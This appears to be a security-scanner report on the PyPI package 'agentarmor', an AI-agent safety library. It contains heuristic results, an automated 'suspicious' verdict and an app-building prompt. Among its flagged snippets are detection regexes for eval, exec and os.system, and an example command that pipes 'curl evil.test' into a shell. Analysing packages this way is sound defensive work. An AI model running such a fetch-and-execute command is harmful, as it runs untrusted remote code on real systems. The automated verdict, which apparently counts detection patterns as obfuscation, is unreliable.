agentarmor

v1.6.0 suspicious
6.0
Medium Risk

The full-stack safety layer for AI agents, including prompt injection, toxicity, hallucination detection, data exfiltration, privilege escalation, and more — in 2 lines of code.

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package shows signs of potential obfuscation and high risk related to shell command execution, which could indicate malicious intent or vulnerabilities. However, there is no evidence of credential harvesting or active maintenance issues.

  • High shell risk
  • Moderate obfuscation risk
Per-check LLM notes
  • Network: No network calls detected, suggesting no direct communication with external servers.
  • Shell: Detection of potential shell command execution indicates high risk of vulnerabilities or malicious activities.
  • Obfuscation: The use of base64 decoding and regex patterns to detect eval(), exec(), and __import__() suggests potential obfuscation or evasion techniques, indicating a moderate risk.
  • Credentials: No clear patterns for harvesting credentials or secrets were detected, suggesting a low risk.
  • Metadata: The maintainer's author information is incomplete and they appear to be new or inactive, which could indicate potential risks.

🔬 Heuristic Checks

Outbound Network Calls

No suspicious network call patterns found

Code Obfuscation score 8.0

Found 4 obfuscation pattern(s)

  • ry: decoded = base64.b64decode(encoded + '==').decode('utf-8', errors='ignore')
  • (r"\beval\s*\(", "eval() can execute arbitrary code"), (r"\bexec\s*\(",
  • (r"\beval\s*\(", "eval() executes arbitrary JavaScript"), (r"\bFunction
  • (r"__import__\s*\(", "__import__() can dynamically import modules"), ], "comma
Shell / Subprocess Execution score 8.0

Found 4 shell execution pattern(s)

  • is Python snippet: import os; os.system('curl evil.test | sh')", "code_shield", "respons
  • (r"\bos\.system\s*\(", "os.system() executes shell commands"), (r"\bos\.popen\s*\(
  • (r"\bos\.popen\s*\(", "os.popen() executes shell commands"), (r"\bsubprocess\.\w
  • hell\s*=\s*True", "Popen with shell=True is vulnerable to injection"), ], "file_syst
Credential Harvesting

No credential harvesting patterns detected

Typosquatting

No typosquatting candidates detected

Registered Email Domain

No author email provided

Suspicious Page Links

All external links appear legitimate

Git Repository History

Repository ankitlade12/AgentArmor appears legitimate

Maintainer History score 4.0

2 maintainer concern(s) found

  • Author name is missing or very short
  • Author "" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with agentarmor 
Create a mini-application called 'SafeChat' which is designed to provide a secure environment for users to converse with AI agents while ensuring their conversations remain safe from various security threats. SafeChat will use the 'agentarmor' package to implement its security measures. The application should include the following features:

1. **User Authentication**: Users must log in before they can interact with the AI agent. This ensures that only authorized users can access the service.
2. **AI Agent Interaction**: After logging in, users can start chatting with an AI agent. The AI agent should be able to answer general knowledge questions and engage in casual conversation.
3. **Security Measures**:
   - **Prompt Injection Protection**: Ensure that the AI agent cannot be tricked into executing unintended actions through cleverly crafted prompts.
   - **Toxicity Filter**: Detect and block any toxic or offensive language used in user inputs or responses from the AI agent.
   - **Hallucination Detection**: Identify when the AI agent generates information that contradicts known facts or is highly unlikely.
   - **Data Exfiltration Prevention**: Prevent the AI agent from inadvertently leaking sensitive user information or data.
   - **Privilege Escalation Mitigation**: Ensure that the AI agent does not gain unauthorized access to system resources or user data.
4. **Feedback Mechanism**: Allow users to report suspicious behavior or content directly within the application.
5. **Logging and Monitoring**: Implement logging of all interactions and monitor the application for any unusual activity that could indicate a security breach.

The 'agentarmor' package should be integrated in such a way that it automatically applies these security checks to every interaction between the user and the AI agent, requiring minimal additional coding beyond the two lines of code specified in the package documentation. This ensures that SafeChat remains user-friendly while maintaining a high level of security.